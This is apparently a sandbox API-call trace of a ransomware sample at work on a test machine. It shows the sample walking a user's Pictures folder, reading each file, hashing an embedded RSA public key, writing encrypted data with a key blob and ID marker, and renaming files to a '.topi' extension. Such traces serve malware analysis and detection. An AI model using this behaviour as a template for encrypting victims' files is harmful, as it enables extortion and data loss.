RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9600 [0095.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9648 [0095.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9618 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9618 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9618 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9648 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9630 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9600 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95e8 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f2070 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.703] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xfaa5, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xfaa5, lpOverlapped=0x0) returned 1 [0095.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.704] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xfaaa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.704] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.704] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.704] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.704] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.704] CloseHandle (hObject=0x6a8) returned 1 [0095.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.706] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uloc.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uloc.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uloc.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uloc.png.topi")) returned 1 [0095.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.706] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.707] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99c4e330, ftCreationTime.dwHighDateTime=0x1d5c1e0, ftLastAccessTime.dwLowDateTime=0x443ae330, ftLastAccessTime.dwHighDateTime=0x1d5be87, ftLastWriteTime.dwLowDateTime=0x443ae330, ftLastWriteTime.dwHighDateTime=0x1d5be87, nFileSizeHigh=0x0, nFileSizeLow=0x15bff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xRR-s9IfhD.bmp", cAlternateFileName="XRR-S9~1.BMP")) returned 1 [0095.707] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.708] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xRR-s9IfhD.bmp") returned=".bmp" [0095.708] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xRR-s9IfhD.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xrr-s9ifhd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.708] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=89087) returned 1 [0095.708] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.711] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15bd9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.711] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.712] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.712] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x15bff, lpOverlapped=0x0) returned 1 [0095.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.713] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.713] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.713] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.713] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.713] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.713] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.714] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.714] GetLastError () returned 0x0 [0095.714] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.714] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.714] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.714] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.714] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x15c00) returned 0x9a06a00 [0095.714] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2070 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95e8 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f20b8 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9600 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9630 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9648 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.715] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9630 | out: hHeap=0x680000) returned 1 [0095.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9648 | out: hHeap=0x680000) returned 1 [0095.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9648 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9630 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9648 | out: hHeap=0x680000) returned 1 [0095.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9630 | out: hHeap=0x680000) returned 1 [0095.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.717] GetCurrentThreadId () returned 0x8c4 [0095.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6b20 [0095.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.718] GetCurrentThreadId () returned 0x8c4 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9630 [0095.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.719] 